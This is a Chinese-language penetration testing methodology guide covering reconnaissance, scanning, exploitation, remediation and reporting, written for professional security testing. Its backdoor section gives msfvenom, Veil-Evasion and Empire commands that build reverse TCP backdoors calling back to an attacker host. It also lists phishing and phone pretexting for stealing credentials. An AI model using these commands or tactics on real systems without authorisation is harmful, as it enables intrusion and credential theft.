渗透测试流程
1. 信息收集阶段
网络拓扑结构分析
- 使用nmap扫描目标网络,获取目标主机IP地址和开放端口信息
- 使用whois查询目标域名的注册信息和DNS服务器信息
- 使用nslookup查询目标域名的IP地址和子域名信息
- 使用traceroute获取目标主机的路由信息
- 使用ping测试目标主机的可达性和响应时间
- 使用社交工程学手段获取目标员工信息和组织架构信息
- 使用公开信息收集工具(如Shodan)查询目标网络的设备和服务信息
域名信息收集
- 使用whois工具获取目标域名的注册信息,包括注册人、注册商、注册日期、过期日期等。
- 使用nslookup或dig工具查询目标域名的DNS记录,获取目标域名的IP地址。
- 使用子域名枚举工具,如sublist3r、amass等,获取目标域名的所有子域名。
- 使用网站爬虫工具,如SpiderFoot、theHarvester等,获取目标域名关联的其他域名、邮箱、IP地址等信息。
端口扫描
- 使用nmap进行端口扫描,命令如下:
nmap -sS -p 1-65535 target_ip
- 结果示例:
Starting Nmap 7.80 ( https://nmap.org ) at 2021-10-01 15:34 CST
Nmap scan report for target_ip
Host is up (0.12s latency).
Not shown: 65530 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
139/tcp open netbios-ssn
443/tcp open https
2049/tcp open nfs
3306/tcp open mysql
5432/tcp open postgresql
8080/tcp open http-proxy
20000/tcp open dnp
- 解释:
-sS参数表示使用TCP SYN扫描方式;-p参数表示扫描的端口范围,这里扫描了1-65535所有端口;target_ip为目标IP地址。
操作系统识别
- 使用nmap扫描目标IP地址,获取目标主机开放的端口和服务信息。
- 使用nmap的操作系统识别功能,获取目标主机所使用的操作系统类型和版本信息。
- 使用whois查询目标域名的注册信息,获取目标公司、联系人等信息。
- 使用搜索引擎(如Google)搜索目标公司的网站、子域名等信息,获取目标公司的业务范围、技术架构等信息。
- 使用社交媒体(如LinkedIn)搜索目标公司的员工信息,获取目标公司的组织结构、职责分工等信息。
服务识别
- 使用nmap扫描目标IP地址,识别目标主机开放的端口和运行的服务。
- 使用WhatWeb扫描目标网站,识别目标网站所使用的Web框架、CMS、Web服务器等信息。
- 使用whois查询目标域名的注册信息,获取目标组织的联系方式和技术架构等信息。
- 使用Google Hacking Database搜索目标组织的敏感信息,如用户名、密码、配置文件等。
Web应用程序识别
- 使用搜索引擎和目录枚举工具,如Google Hacking Database、Baidu、Shodan等,来发现目标网站的存在。
- 使用Whois查询工具获取目标网站的所有者信息。
- 使用DNS查询工具来枚举目标网站的子域名。
- 使用端口扫描工具,如Nmap、Masscan等,来确定目标网站上开放的端口和服务。
- 使用Web应用程序识别工具,如Wappalyzer、WhatWeb等,来确定目标网站上使用的技术栈、框架和CMS等。
表格示例:
| 工具名称 | 功能描述 |
|---|---|
| Google Hacking Database | 使用Google搜索语法来发现目标网站的存在 |
| Whois查询工具 | 获取目标网站的所有者信息 |
| DNS查询工具 | 枚举目标网站的子域名 |
| 端口扫描工具 | 确定目标网站上开放的端口和服务 |
| Web应用程序识别工具 | 确定目标网站上使用的技术栈、框架和CMS等 |
敏感信息收集- 通过搜索引擎查找相关公司网站,获取公司名称、业务范围、联系方式等敏感信息。
- 使用WHOIS查询工具,获取目标网站的注册人、注册邮箱、IP地址等敏感信息。
- 使用社交媒体平台,如LinkedIn、Facebook等,查找目标公司的员工信息、职位等敏感信息。
- 使用在线工具,如网站漏洞扫描器、端口扫描器等,获取目标网站的漏洞信息、开放端口等敏感信息。
- 通过邮件伪造、电话欺骗等方式,获取目标公司的敏感信息,如员工账号、密码等。
2. 漏洞扫描阶段
漏洞扫描工具选择
-
Nmap
nmap -sS -sV -O target_IP -
Nessus
打开Nessus扫描器,输入目标IP地址,选择扫描模板,开始扫描 -
OpenVAS
打开OpenVAS扫描器,输入目标IP地址,选择扫描模板,开始扫描 -
Burp Suite
打开Burp Suite,配置代理,使用Burp Scanner进行扫描 -
Metasploit
打开Metasploit,使用auxiliary模块进行扫描 -
Acunetix
打开Acunetix,输入目标URL,选择扫描模板,开始扫描 -
sqlmap
sqlmap -u "target_URL" --dbs
漏洞扫描目标选择
- 漏洞扫描目标选择示例:
| 目标 | 描述 |
|---|---|
| Web应用程序 | 使用Burp Suite、OWASP ZAP等工具对Web应用程序进行扫描 |
| 网络设备 | 使用Nmap、Angry IP Scanner等工具对网络设备进行扫描 |
| 操作系统 | 使用OpenVAS、Nessus等工具对操作系统进行扫描 |
| 数据库 | 使用SQLMap等工具对数据库进行扫描 |
| 无线网络 | 使用Aircrack-ng等工具对无线网络进行扫描 |
漏洞扫描结果分析
- 漏洞扫描结果分析:
| 漏洞名称 | 漏洞等级 | 影响范围 | 建议处理方案 |
|---|---|---|---|
| SQL注入漏洞 | 高 | 影响整个网站 | 对输入参数进行过滤和转义处理,使用参数化查询 |
| XSS漏洞 | 中 | 影响用户信息安全 | 对用户输入进行过滤和转义处理,使用CSP等防护措施 |
| 未授权访问漏洞 | 低 | 影响部分功能 | 加强权限控制,限制敏感操作的访问权限 |
漏洞验证- 漏洞验证:
| 漏洞名称 | 漏洞描述 | 验证方式 |
|---|---|---|
| SQL注入漏洞 | 通过注入恶意代码来获取数据库中的敏感信息或者修改数据库内容 | 在输入框中输入特定的SQL语句,观察网站是否返回异常信息 |
| XSS漏洞 | 恶意用户在网站上插入脚本代码,当其他用户访问该页面时,脚本会被执行 | 在输入框中输入特定的脚本代码,观察网站是否执行该脚本 |
| 文件上传漏洞 | 允许用户上传文件,但没有对上传文件进行充分的验证和过滤,攻击者可以上传恶意文件 | 上传包含恶意代码的文件,观察网站是否正常处理该文件 |
3. 渗透攻击阶段
渗透攻击工具选择
-
渗透攻击工具选择:
工具名称 用途 Nmap 端口扫描 Metasploit 漏洞利用 Burp Suite Web应用程序攻击 Aircrack-ng 无线网络攻击 Hydra 密码破解 John the Ripper 密码破解 Sqlmap SQL注入攻击 Wireshark 网络流量分析 Netcat 网络工具 Hping 网络工具
渗透攻击方式选择
-
渗透攻击方式选择:
攻击方式 描述 社交工程学 通过社交技巧获取目标系统的信息,如钓鱼邮件、电话诈骗等。 漏洞利用 利用已知或未知漏洞攻击目标系统,如使用Metasploit框架等。 密码破解 尝试破解目标系统的密码,如使用密码字典、暴力破解等。 物理攻击 直接进入目标系统所在的物理环境进行攻击,如进入机房、拆卸硬件等。
渗透攻击结果分析
- 渗透攻击结果分析:
- 通过渗透测试工具获取的漏洞信息,如nmap、nessus等工具的扫描结果。
- 通过手工测试获取的漏洞信息,如SQL注入、XSS等漏洞。
- 分析漏洞的危害程度,如是否可利用、对系统的影响等。
- 提出修复建议,如修补漏洞、升级补丁等。
渗透攻击后门植入- 使用Metasploit生成反向TCP后门:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker IP> LPORT=<attacker port> -f exe > backdoor.exe
-
使用Veil-Evasion生成反向TCP后门:
veil-evasion.py usestager/windows/meterpreter/rev_tcp set LHOST <attacker IP> set LPORT <attacker port> generate -
使用Empire生成反向TCP后门:
listeners uselistener http set Name http set Host <attacker IP> set Port <attacker port> execute back usestager windows/launcher_bat set Listener http execute
表格:
| 后门类型 | 植入方法 |
|---|---|
| Webshell | 通过漏洞上传Webshell,或者在服务器上直接创建Webshell |
| Rootkit | 修改系统内核或者驱动程序 |
| Trojan | 通过社会工程学手段诱骗用户下载安装 |
| RAT | 通过漏洞或者社会工程学手段植入远程控制软件 |
4. 漏洞修复阶段
漏洞修复建议
- 漏洞修复建议:
- 修复漏洞前先备份数据和系统。
- 优先修复高危漏洞,其次再修复中危和低危漏洞。
- 修复漏洞时要注意不要引入新的漏洞。
- 对修复后的系统进行再次测试,以确保漏洞已经被修复。
- 对修复后的系统进行监控和日志审计,及时发现新的漏洞或攻击行为。
漏洞修复跟踪- 漏洞修复跟踪:
| 漏洞编号 | 漏洞描述 | 修复状态 | 修复人员 | 修复时间 |
|---|---|---|---|---|
| 001 | SQL注入漏洞 | 已修复 | 张三 | 2021-05-01 |
| 002 | XSS漏洞 | 未修复 | 李四 | - |
| 003 | 文件上传漏洞 | 已修复 | 王五 | 2021-05-02 |
5. 报告编写阶段
渗透测试报告结构
- 渗透测试报告结构:
标题 内容 1. 引言 对渗透测试的目的、范围、方法、工具等进行说明 2. 测试过程 对测试的步骤、方法、结果进行详细描述 3. 漏洞分析 对测试中发现的漏洞进行分析、评估和分类 4. 风险评估 对漏洞的风险进行评估和分类,并提出相应的建议和措施 5. 结论和建议 对测试结果进行总结,并提出相应的建议和措施 6. 附录 包括测试过程中的截图、日志、代码等详细信息
报告编写要点
- 报告编写要点:
- 对测试结果进行详细描述,包括测试的目标、范围、方法和结果。
- 列出所有发现的漏洞和安全问题,并按照优先级进行分类。
- 对每个漏洞或安全问题进行详细描述,包括其影响、利用方法和建议的修复方案。
- 提供截图、漏洞利用脚本等支持证据。
- 针对每个漏洞或安全问题,提供相应的修复建议并给出修复建议的优先级。
- 附上测试人员的联系方式,以便在需要时进行进一步沟通。
报告提交及漏洞公开风险评估- 报告提交及漏洞公开风险评估示例:
- 将渗透测试报告提交给客户,并说明测试过程中发现的漏洞及其风险等级。
- 对于高风险漏洞,需要在报告中提供详细的修复建议,并督促客户及时修复。
- 在报告中评估漏洞公开的风险,对于可能会导致严重后果的漏洞,需要在报告中说明风险,并建议客户尽快修复。同时,需要提醒客户在修复之前谨慎处理漏洞信息,避免泄露给攻击者。